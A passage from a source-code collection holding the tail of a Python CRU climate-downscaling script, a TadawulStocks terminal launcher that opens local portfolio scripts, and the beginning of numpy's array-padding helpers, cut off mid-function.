os.makedirs( downscaled_path )
# template setup
template_raster = rasterio.open( self.template_raster_fn )
template_meta = template_raster.meta
template_meta.update( crs={'init':'epsg:3338'} )
# make a mask with values of 0=nodata and 1=data
template_raster_mask = template_raster.read_masks( 1 ) # mask of band 1 is all we need
template_raster_mask[ template_raster_mask == 255 ] = 1
anomalies = self.utils.calc_anomalies( self.cru_ts, variable, absolute=self.absolute )
anomalies_pcll, lons_pcll = self.utils.shiftgrid( 0., anomalies, anomalies.lon.data ) # grabs lons from the xray ds
# mesh the lons and lats and unravel them to 1-D
lo, la = [ i.ravel() for i in np.meshgrid( lons_pcll, anomalies.lat ) ]
# convert into pandas.DataFrame and drop all the NaNs -- land-only dataset
anom_df_list = [ pd.DataFrame({ 'anom':i.ravel(), 'lat':la, 'lon':lo }).dropna( axis=0, how='any' ) for i in anomalies_pcll ]
xi, yi = np.meshgrid( lons_pcll, anomalies.lat.data )
# argument setup -- HARDWIRED
src_transform = affine.Affine( 0.5, 0.0, -180.0, 0.0, -0.5, 90.0 )
src_nodata = -9999.0
# output_filenames setup
years = np.unique( self._get_years_cru( self.cru_ts ) )
cru_ts_version = self._get_version_cru( self.cru_ts ) # works if naming convention stays same
months = [ i if len(i)==2 else '0'+i for i in np.arange( 1, 12+1, 1 ).astype( str ).tolist() ]
month_year = [ (month, year) for year in years for month in months ]
output_filenames = [ os.path.join( anomalies_path, '_'.join([ variable, self.metric, cru_ts_version, 'anom', month, str(year) ])+'.tif' )
for month, year in month_year ]
# NEW
# read in the pre-processed 12-month climatology
clim_list = sorted( glob.glob( os.path.join( self.clim_path, '*.tif' ) ) ) # this could catch you.
clim_dict = { month:rasterio.open( fn ).read( 1 ) for month, fn in zip( months, clim_list ) }
output_filenames = [ os.path.join( downscaled_path, '_'.join([ variable, self.metric, cru_ts_version, 'downscaled', month, str(year) ])+'.tif' )
for month, year in month_year ]
# set downscaling_operation based on self.absolute boolean
if self.absolute == True:
downscaling_operation = 'add'
elif self.absolute == False:
downscaling_operation = 'mult'
else:
AttributeError( 'downscaling operation: self.absolute must be boolean' )
args_list = [ { 'anom_df':anom_df,
'meshgrid_tuple':(xi, yi),
'template_raster_fn':template_raster_fn,
'lons_pcll':lons_pcll,
'src_transform':src_transform,
'src_crs':self.src_crs, \
'src_nodata':src_nodata,
'output_filename':out_fn,
'baseline_arr':clim_dict[ self._fn_month_grouper( out_fn ) ],
'downscaling_operation':downscaling_operation,
'post_downscale_function':self.post_downscale_function,
'write_anomalies':self.write_anomalies }
for anom_df, out_fn in zip( anom_df_list, output_filenames ) ]
# run anomalies interpolation and downscaling in a single go.
out = mp_map( lambda args: self._interp_downscale_wrapper( args_dict=args ), args_list, nproc=self.ncores )
return 'downscaling complete. files output at: %s' % base_path
if __name__ == '__main__':
# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
# example of use of the new DownscaleCRU / DownscalingUtils classes
# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
# example of post_downscale_function - pass in at DownscaleCRU()
def clamp_vals( x ):
''' clamp the values following the relative humidity downscaling '''
x[ (x > 100) & (x < 500) ] = 95
return x
# minimum required arguments
cru_ts = '/Data/Base_Data/Climate/World/CRU_grids/CRU_TS323/cru_ts3.23.1901.2014.cld.dat.nc'
clim_path = '/workspace/Shared/Tech_Projects/ALFRESCO_Inputs/project_data/TEM_Data/cru_october_final/cru_cl20/cld/akcan'
template_raster_fn = '/workspace/Shared/Tech_Projects/ALFRESCO_Inputs/project_data/TEM_Data/templates/tas_mean_C_AR5_GFDL-CM3_historical_01_1860.tif'
base_path = '/atlas_scratch/malindgren/CMIP5'
# run example
down = DownscaleCRU( cru_ts, clim_path, template_raster_fn, base_path, absolute=False, ncores=32 )
output = down.downscale_cru_ts()
|
mit
|
Logic-gate/TadawulStocks
|
launcher.py
|
1
|
5299
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# TadawulStocks v 0.1 - launcher.py
# Copyright (C) <2014> mad_dev(A'mmer Almadani)
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL A'MMER ALMADANI BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Report any issues with this script to <[email protected]>
import npyscreen
import curses
from subprocess import Popen
from sys import exit
import threading
from collections import defaultdict
import ConfigParser
import time
from market.TadawulStocks import *
import re
__author__ = 'Amer Almadani'
__email__ = '[email protected]'
class ActionControllerSearch(npyscreen.ActionControllerSimple):
def create(self):
npyscreen.setTheme(npyscreen.Themes.TransparentThemeLightText)
self.add_action('^/.*', self.write2main, True)
def action(self, command, msg):
current = time.strftime('%c')
value = [current]
self.ThreadOpen(command).start()
value.append(msg)
self.parent.wMain.values = value
def write2main(self, command_line, prox, live):
self.parent.value.set_filter(command_line[1:])
self.parent.wMain.values = ['Command must start with /']
emulator = Conf().get('SYS', 'emulator')
command = Conf().get('SYS', 'command')
action_geo = Conf().get('ACTION', 'emulator_geo_title')
main_geo = Conf().get('MAIN', 'emulator_geo_title')
view_geo = Conf().get('VIEW', 'emulator_geo_title')
feed_geo = Conf().get('FEED', 'emulator_geo_title')
if str(command_line) == '/help':
self.parent.wMain.values = ["refresh: Launch the portfolio refresher(n); n = 10 sec",
"action: Launch the buy and sell window",
"my: Launch your portfolio view",
"stock: Show all stocks",
"fetch: Fetch prices from Tadawul.com.sa",
"log_sell: Show the sell log",
"log_buy: Show the buy log",]
elif str(command_line) == '/action':
self.action('''%s %s %s "python action.py"''' %(emulator, action_geo, command), 'Action has been started. You can buy and sell from it')
elif str(command_line) == '/refresh':
self.action('''%s %s %s "python -c 'from refresh import run; run()'"''' %(emulator, main_geo, command), 'Your portfolio is being refreshed every 10 seconds')
elif str(command_line) == '/my':
self.action('''%s %s %s "python view.py"''' %(emulator, view_geo, command), 'Your portfolio view has started. Issue fetch command to add new prices')
elif str(command_line) == '/fetch':
self.action('''%s %s %s "python feeder.py"''' %(emulator, feed_geo, command), 'Fetching data...')
elif str(command_line) == '/log_sell':
log_entry = [line.rstrip('\n') for line in open('log/sell.log')]
self.parent.wMain.values = log_entry
elif str(command_line) == '/log_buy':
log_entry = [line.rstrip('\n') for line in open('log/buy.log')]
self.parent.wMain.values = log_entry
elif str(command_line) == '/stock':
self.parent.wMain.values = GetList('All')
elif str(command_line) == '/exit':
exit('Goodbye!')
self.parent.wMain.display()
class ThreadOpen(threading.Thread):
def __init__(self, cmd):
threading.Thread.__init__(self)
self.cmd = cmd
def run(self):
Popen(self.cmd, shell=True)
class FmSearchActive(npyscreen.FormMuttActiveTraditional):
ACTION_CONTROLLER = ActionControllerSearch
class LaunchApp(npyscreen.NPSApp):
def main(self):
F = FmSearchActive()
#Thanks to N.Cole
del F.wMain.handlers[ord('l')] #remove 'l' as find
F.wMain.handlers.update({"^F": F.wMain.h_set_filter}) #add CTRL-F
F.wStatus1.value = "LOG"
F.wStatus2.value = "COMMAND"
F.wMain.values = ['Command must start with /','/help for commands']
F.edit()
if __name__ == "__main__":
def Conf():
config = ConfigParser.ConfigParser()
config.read('conf/info.conf')
return config
App = LaunchApp()
try:
App.run()
except KeyboardInterrupt:
print("Goodbye")
|
mpl-2.0
|
MaPePeR/numpy
|
numpy/lib/arraypad.py
|
41
|
52069
|
"""
The arraypad module contains a group of functions to pad values onto the edges
of an n-dimensional array.
"""
from __future__ import division, absolute_import, print_function
import numpy as np
__all__ = ['pad']
###############################################################################
# Private utility functions.
def _arange_ndarray(arr, shape, axis, reverse=False):
"""
Create an ndarray of `shape` with increments along specified `axis`
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
shape : tuple of ints
Shape of desired array. Should be equivalent to `arr.shape` except
`shape[axis]` which may have any positive value.
axis : int
Axis to increment along.
reverse : bool
If False, increment in a positive fashion from 1 to `shape[axis]`,
inclusive. If True, the bounds are the same but the order reversed.
Returns
-------
padarr : ndarray
Output array sized to pad `arr` along `axis`, with linear range from
1 to `shape[axis]` along specified `axis`.
Notes
-----
The range is deliberately 1-indexed for this specific use case. Think of
this algorithm as broadcasting `np.arange` to a single `axis` of an
arbitrarily shaped ndarray.
"""
initshape = tuple(1 if i != axis else shape[axis]
for (i, x) in enumerate(arr.shape))
if not reverse:
padarr = np.arange(1, shape[axis] + 1)
else:
padarr = np.arange(shape[axis], 0, -1)
padarr = padarr.reshape(initshape)
for i, dim in enumerate(shape):
if padarr.shape[i] != dim:
padarr = padarr.repeat(dim, axis=i)
return padarr
def _round_ifneeded(arr, dtype):
"""
Rounds arr inplace if destination dtype is integer.
Parameters
----------
arr : ndarray
Input array.
dtype : dtype
The dtype of the destination array.
"""
if np.issubdtype(dtype, np.integer):
arr.round(out=arr)
def _prepend_const(arr, pad_amt, val, axis=-1):
"""
Prepend constant `val` along `axis` of `arr`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to prepend.
val : scalar
Constant value to use. For best results should be of type `arr.dtype`;
if not `arr.dtype` will be cast to `arr.dtype`.
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` constant `val` prepended along `axis`.
"""
if pad_amt == 0:
return arr
padshape = tuple(x if i != axis else pad_amt
for (i, x) in enumerate(arr.shape))
if val == 0:
return np.concatenate((np.zeros(padshape, dtype=arr.dtype), arr),
axis=axis)
else:
return np.concatenate(((np.zeros(padshape) + val).astype(arr.dtype),
arr), axis=axis)
def _append_const(arr, pad_amt, val, axis=-1):
"""
Append constant `val` along `axis` of `arr`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to append.
val : scalar
Constant value to use. For best results should be of type `arr.dtype`;
if not `arr.dtype` will be cast to `arr.dtype`.
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` constant `val` appended along `axis`.
"""
if pad_amt == 0:
return arr
padshape = tuple(x if i != axis else pad_amt
for (i, x) in enumerate(arr.shape))
if val == 0:
return np.concatenate((arr, np.zeros(padshape, dtype=arr.dtype)),
axis=axis)
else:
return np.concatenate(
(arr, (np.zeros(padshape) + val).astype(arr.dtype)), axis=axis)
def _prepend_edge(arr, pad_amt, axis=-1):
"""
Prepend `pad_amt` to `arr` along `axis` by extending edge values.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to prepend.
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, extended by `pad_amt` edge values appended along `axis`.
"""
if pad_amt == 0:
return arr
edge_slice = tuple(slice(None) if i != axis else 0
for (i, x) in enumerate(arr.shape))
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
edge_arr = arr[edge_slice].reshape(pad_singleton)
return np.concatenate((edge_arr.repeat(pad_amt, axis=axis), arr),
axis=axis)
def _append_edge(arr, pad_amt, axis=-1):
"""
Append `pad_amt` to `arr` along `axis` by extending edge values.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to append.
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, extended by `pad_amt` edge values prepended along
`axis`.
"""
if pad_amt == 0:
return arr
edge_slice = tuple(slice(None) if i != axis else arr.shape[axis] - 1
for (i, x) in enumerate(arr.shape))
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
edge_arr = arr[edge_slice].reshape(pad_singleton)
return np.concatenate((arr, edge_arr.repeat(pad_amt, axis=axis)),
axis=axis)
def _prepend_ramp(arr, pad_amt, end, axis=-1):
"""
Prepend linear ramp along `axis`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to prepend.
end : scalar
Constal value to use. For best results should be of type `arr.dtype`;
if not `arr.dtype` will be cast to `arr.dtype`.
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` values prepended along `axis`. The
prepended region ramps linearly from the edge value to `end`.
"""
if pad_amt == 0:
return arr
# Generate shape for final concatenated array
padshape = tuple(x if i != axis else pad_amt
for (i, x) in enumerate(arr.shape))
# Generate an n-dimensional array incrementing along `axis`
ramp_arr = _arange_ndarray(arr, padshape, axis,
reverse=True).astype(np.float64)
# Appropriate slicing to extract n-dimensional edge along `axis`
edge_slice = tuple(slice(None) if i != axis else 0
for (i, x) in enumerate(arr.shape))
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract edge, reshape to original rank, and extend along `axis`
edge_pad = arr[edge_slice].reshape(pad_singleton).repeat(pad_amt, axis)
# Linear ramp
slope = (end - edge_pad) / float(pad_amt)
ramp_arr = ramp_arr * slope
ramp_arr += edge_pad
_round_ifneeded(ramp_arr, arr.dtype)
# Ramp values will most likely be float, cast them to the same type as arr
return np.concatenate((ramp_arr.astype(arr.dtype), arr), axis=axis)
def _append_ramp(arr, pad_amt, end, axis=-1):
"""
Append linear ramp along `axis`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to append.
end : scalar
Constal value to use. For best results should be of type `arr.dtype`;
if not `arr.dtype` will be cast to `arr.dtype`.
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` values appended along `axis`. The
appended region ramps linearly from the edge value to `end`.
"""
if pad_amt == 0:
return arr
# Generate shape for final concatenated array
padshape = tuple(x if i != axis else pad_amt
for (i, x) in enumerate(arr.shape))
# Generate an n-dimensional array incrementing along `axis`
ramp_arr = _arange_ndarray(arr, padshape, axis,
reverse=False).astype(np.float64)
# Slice a chunk from the edge to calculate stats on
edge_slice = tuple(slice(None) if i != axis else -1
for (i, x) in enumerate(arr.shape))
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract edge, reshape to original rank, and extend along `axis`
edge_pad = arr[edge_slice].reshape(pad_singleton).repeat(pad_amt, axis)
# Linear ramp
slope = (end - edge_pad) / float(pad_amt)
ramp_arr = ramp_arr * slope
ramp_arr += edge_pad
_round_ifneeded(ramp_arr, arr.dtype)
# Ramp values will most likely be float, cast them to the same type as arr
return np.concatenate((arr, ramp_arr.astype(arr.dtype)), axis=axis)
def _prepend_max(arr, pad_amt, num, axis=-1):
"""
Prepend `pad_amt` maximum values along `axis`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to prepend.
num : int
Depth into `arr` along `axis` to calculate maximum.
Range: [1, `arr.shape[axis]`] or None (entire axis)
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` values appended along `axis`. The
prepended region is the maximum of the first `num` values along
`axis`.
"""
if pad_amt == 0:
return arr
# Equivalent to edge padding for single value, so do that instead
if num == 1:
return _prepend_edge(arr, pad_amt, axis)
# Use entire array if `num` is too large
if num is not None:
if num >= arr.shape[axis]:
num = None
# Slice a chunk from the edge to calculate stats on
max_slice = tuple(slice(None) if i != axis else slice(num)
for (i, x) in enumerate(arr.shape))
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract slice, calculate max, reshape to add singleton dimension back
max_chunk = arr[max_slice].max(axis=axis).reshape(pad_singleton)
# Concatenate `arr` with `max_chunk`, extended along `axis` by `pad_amt`
return np.concatenate((max_chunk.repeat(pad_amt, axis=axis), arr),
axis=axis)
def _append_max(arr, pad_amt, num, axis=-1):
"""
Pad one `axis` of `arr` with the maximum of the last `num` elements.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to append.
num : int
Depth into `arr` along `axis` to calculate maximum.
Range: [1, `arr.shape[axis]`] or None (entire axis)
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` values appended along `axis`. The
appended region is the maximum of the final `num` values along `axis`.
"""
if pad_amt == 0:
return arr
# Equivalent to edge padding for single value, so do that instead
if num == 1:
return _append_edge(arr, pad_amt, axis)
# Use entire array if `num` is too large
if num is not None:
if num >= arr.shape[axis]:
num = None
# Slice a chunk from the edge to calculate stats on
end = arr.shape[axis] - 1
if num is not None:
max_slice = tuple(
slice(None) if i != axis else slice(end, end - num, -1)
for (i, x) in enumerate(arr.shape))
else:
max_slice = tuple(slice(None) for x in arr.shape)
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract slice, calculate max, reshape to add singleton dimension back
max_chunk = arr[max_slice].max(axis=axis).reshape(pad_singleton)
# Concatenate `arr` with `max_chunk`, extended along `axis` by `pad_amt`
return np.concatenate((arr, max_chunk.repeat(pad_amt, axis=axis)),
axis=axis)
def _prepend_mean(arr, pad_amt, num, axis=-1):
"""
Prepend `pad_amt` mean values along `axis`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to prepend.
num : int
Depth into `arr` along `axis` to calculate mean.
Range: [1, `arr.shape[axis]`] or None (entire axis)
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` values prepended along `axis`. The
prepended region is the mean of the first `num` values along `axis`.
"""
if pad_amt == 0:
return arr
# Equivalent to edge padding for single value, so do that instead
if num == 1:
return _prepend_edge(arr, pad_amt, axis)
# Use entire array if `num` is too large
if num is not None:
if num >= arr.shape[axis]:
num = None
# Slice a chunk from the edge to calculate stats on
mean_slice = tuple(slice(None) if i != axis else slice(num)
for (i, x) in enumerate(arr.shape))
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract slice, calculate mean, reshape to add singleton dimension back
mean_chunk = arr[mean_slice].mean(axis).reshape(pad_singleton)
_round_ifneeded(mean_chunk, arr.dtype)
# Concatenate `arr` with `mean_chunk`, extended along `axis` by `pad_amt`
return np.concatenate((mean_chunk.repeat(pad_amt, axis).astype(arr.dtype),
arr), axis=axis)
def _append_mean(arr, pad_amt, num, axis=-1):
"""
Append `pad_amt` mean values along `axis`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to append.
num : int
Depth into `arr` along `axis` to calculate mean.
Range: [1, `arr.shape[axis]`] or None (entire axis)
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` values appended along `axis`. The
appended region is the maximum of the final `num` values along `axis`.
"""
if pad_amt == 0:
return arr
# Equivalent to edge padding for single value, so do that instead
if num == 1:
return _append_edge(arr, pad_amt, axis)
# Use entire array if `num` is too large
if num is not None:
if num >= arr.shape[axis]:
num = None
# Slice a chunk from the edge to calculate stats on
end = arr.shape[axis] - 1
if num is not None:
mean_slice = tuple(
slice(None) if i != axis else slice(end, end - num, -1)
for (i, x) in enumerate(arr.shape))
else:
mean_slice = tuple(slice(None) for x in arr.shape)
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract slice, calculate mean, reshape to add singleton dimension back
mean_chunk = arr[mean_slice].mean(axis=axis).reshape(pad_singleton)
_round_ifneeded(mean_chunk, arr.dtype)
# Concatenate `arr` with `mean_chunk`, extended along `axis` by `pad_amt`
return np.concatenate(
(arr, mean_chunk.repeat(pad_amt, axis).astype(arr.dtype)), axis=axis)
def _prepend_med(arr, pad_amt, num, axis=-1):
"""
Prepend `pad_amt` median values along `axis`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to prepend.
num : int
Depth into `arr` along `axis` to calculate median.
Range: [1, `arr.shape[axis]`] or None (entire axis)
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` values prepended along `axis`. The
prepended region is the median of the first `num` values along `axis`.
"""
if pad_amt == 0:
return arr
# Equivalent to edge padding for single value, so do that instead
if num == 1:
return _prepend_edge(arr, pad_amt, axis)
# Use entire array if `num` is too large
if num is not None:
if num >= arr.shape[axis]:
num = None
# Slice a chunk from the edge to calculate stats on
med_slice = tuple(slice(None) if i != axis else slice(num)
for (i, x) in enumerate(arr.shape))
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract slice, calculate median, reshape to add singleton dimension back
med_chunk = np.median(arr[med_slice], axis=axis).reshape(pad_singleton)
_round_ifneeded(med_chunk, arr.dtype)
# Concatenate `arr` with `med_chunk`, extended along `axis` by `pad_amt`
return np.concatenate(
(med_chunk.repeat(pad_amt, axis).astype(arr.dtype), arr), axis=axis)
def _append_med(arr, pad_amt, num, axis=-1):
"""
Append `pad_amt` median values along `axis`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to append.
num : int
Depth into `arr` along `axis` to calculate median.
Range: [1, `arr.shape[axis]`] or None (entire axis)
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` values appended along `axis`. The
appended region is the median of the final `num` values along `axis`.
"""
if pad_amt == 0:
return arr
# Equivalent to edge padding for single value, so do that instead
if num == 1:
return _append_edge(arr, pad_amt, axis)
# Use entire array if `num` is too large
if num is not None:
if num >= arr.shape[axis]:
num = None
# Slice a chunk from the edge to calculate stats on
end = arr.shape[axis] - 1
if num is not None:
med_slice = tuple(
slice(None) if i != axis else slice(end, end - num, -1)
for (i, x) in enumerate(arr.shape))
else:
med_slice = tuple(slice(None) for x in arr.shape)
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract slice, calculate median, reshape to add singleton dimension back
med_chunk = np.median(arr[med_slice], axis=axis).reshape(pad_singleton)
_round_ifneeded(med_chunk, arr.dtype)
# Concatenate `arr` with `med_chunk`, extended along `axis` by `pad_amt`
return np.concatenate(
(arr, med_chunk.repeat(pad_amt, axis).astype(arr.dtype)), axis=axis)
def _prepend_min(arr, pad_amt, num, axis=-1):
"""
Prepend `pad_amt` minimum values along `axis`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to prepend.
num : int
Depth into `arr` along `axis` to calculate minimum.
Range: [1, `arr.shape[axis]`] or None (entire axis)
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` values prepended along `axis`. The
prepended region is the minimum of the first `num` values along
`axis`.
"""
if pad_amt == 0:
return arr
# Equivalent to edge padding for single value, so do that instead
if num == 1:
return _prepend_edge(arr, pad_amt, axis)
# Use entire array if `num` is too large
if num is not None:
if num >= arr.shape[axis]:
num = None
# Slice a chunk from the edge to calculate stats on
min_slice = tuple(slice(None) if i != axis else slice(num)
for (i, x) in enumerate(arr.shape))
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract slice, calculate min, reshape to add singleton dimension back
min_chunk = arr[min_slice].min(axis=axis).reshape(pad_singleton)
# Concatenate `arr` with `min_chunk`, extended along `axis` by `pad_amt`
return np.concatenate((min_chunk.repeat(pad_amt, axis=axis), arr),
axis=axis)
def _append_min(arr, pad_amt, num, axis=-1):
"""
Append `pad_amt` median values along `axis`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to append.
num : int
Depth into `arr` along `axis` to calculate minimum.
Range: [1, `arr.shape[axis]`] or None (entire axis)
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` values appended along `axis`. The
appended region is the minimum of the final `num` values along `axis`.
"""
if pad_amt == 0:
return arr
# Equivalent to edge padding for single value, so do that instead
if num == 1:
return _append_edge(arr, pad_amt, axis)
# Use entire array if `num` is too large
if num is not None:
if num >= arr.shape[axis]:
num = None
# Slice a chunk from the edge to calculate stats on
end = arr.shape[axis] - 1
if num is not None:
min_slice = tuple(
slice(None) if i != axis else slice(end, end - num, -1)
for (i, x) in enumerate(arr.shape))
else:
min_slice = tuple(slice(None) for x in arr.shape)
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract slice, calculate min, reshape to add singleton dimension back
min_chunk = arr[min_slice].min(axis=axis).reshape(pad_singleton)
# Concatenate `arr` with `min_chunk`, extended along `axis` by `pad_amt`
return np.concatenate((arr, min_chunk.repeat(pad_amt, axis=axis)),
axis=axis)
def _pad_ref(arr, pad_amt, method, axis=-1):
"""
Pad `axis` of `arr` by reflection.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : tuple of ints, length 2
Padding to (prepend, append) along `axis`.
method : str
Controls method of reflection; options are 'even' or 'odd'.
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt[0]` values prepended and `pad_amt[1]`
values appended along `axis`. Both regions are padded with reflected
values from the original array.
Notes
-----
This algorithm does not pad with repetition, i.e. the edges are not
repeated in the reflection. For that behavior, use `mode='symmetric'`.
The modes 'reflect', 'symmetric', and 'wrap' must be padded with a
single function, lest the indexing tricks in non-integer multiples of the
original shape would violate repetition in the final iteration.
"""
# Implicit booleanness to test for zero (or None) in any scalar type
if pad_amt[0] == 0 and pad_amt[1] == 0:
return arr
##########################################################################
# Prepended region
# Slice off a reverse indexed chunk from near edge to pad `arr` before
ref_slice = tuple(slice(None) if i != axis else slice(pad_amt[0], 0, -1)
for (i, x) in enumerate(arr.shape))
ref_chunk1 = arr[ref_slice]
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
if pad_amt[0] == 1:
ref_chunk1 = ref_chunk1.reshape(pad_singleton)
# Memory/computationally more expensive, only do this if `method='odd'`
if 'odd' in method and pad_amt[0] > 0:
edge_slice1 = tuple(slice(None) if i != axis else 0
for (i, x) in enumerate(arr.shape))
edge_chunk = arr[edge_slice1].reshape(pad_singleton)
ref_chunk1 = 2 * edge_chunk - ref_chunk1
del edge_chunk
##########################################################################
# Appended region
# Slice off a reverse indexed chunk from far edge to pad `arr` after
start = arr.shape[axis] - pad_amt[1] - 1
end = arr.shape[axis] - 1
ref_slice = tuple(slice(None) if i != axis else slice(start, end)
for (i, x) in enumerate(arr.shape))
rev_idx = tuple(slice(None) if i != axis else slice(None, None, -1)
for (i, x) in enumerate(arr.shape))
ref_chunk2 = arr[ref_slice][rev_idx]
if pad_amt[1] == 1:
ref_chunk2 = ref_chunk2.reshape(pad_singleton)
if 'odd' in method:
edge_slice2 = tuple(slice(None) if i != axis else -1
for (i, x) in enumerate(arr.shape))
edge_chunk = arr[edge_slice2].reshape(pad_singleton)
ref_chunk2 = 2 * edge_chunk - ref_chunk2
del edge_chunk
# Concatenate `arr` with both chunks, extending along `axis`
return np.concatenate((ref_chunk1, arr, ref_chunk2), axis=axis)
def _pad_sym(arr, pad_amt, method, axis=-1):
"""
Pad `axis` of `arr` by symmetry.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : tuple of ints, length 2
Padding to (prepend, append) along `axis`.
method : str
Controls method of symmetry; options are 'even' or 'odd'.
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt[0]` values prepended and `pad_amt[1]`
values appended along `axis`. Both regions are padded with symmetric
values from the original array.
Notes
-----
This algorithm DOES pad with repetition, i.e. the edges are repeated.
For padding without repeated edges, use `mode='reflect'`.
The modes 'reflect', 'symmetric', and 'wrap' must be padded with a
single function, lest the indexing tricks in non-integer multiples of the
original shape would violate repetition in the final iteration.
"""
# Implicit booleanness to test for zero (or None) in any scalar type
if pad_amt[0] == 0 and pad_amt[1] == 0:
return arr
##########################################################################
# Prepended region
# Slice off a reverse indexed chunk from near edge to pad `arr` before
sym_slice = tuple(slice(None) if i != axis else slice(0, pad_amt[0])
for (i, x) in enumerate(arr.shape))
rev_idx = tuple(slice(None) if i != axis else slice(None, None, -1)
for (i, x) in enumerate(arr.shape))
sym_chunk1 = arr[sym_slice][rev_idx]
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
if pad_amt[0] == 1:
sym_chunk1 = sym_chunk1.reshape(pad_singleton)
# Memory/computationally more expensive, only do this if `method='odd'`
if 'odd' in method and pad_amt[0] > 0:
edge_slice1 = tuple(slice(None) if i != axis else 0
for (i, x) in enumerate(arr.shape))
edge_chunk = arr[edge_slice1].reshape(pad_singleton)
sym_chunk1 = 2 * edge_chunk - sym_chunk1
del edge_chunk
##########################################################################
# Appended region
# Slice off a reverse indexed chunk from far edge to pad `arr` after
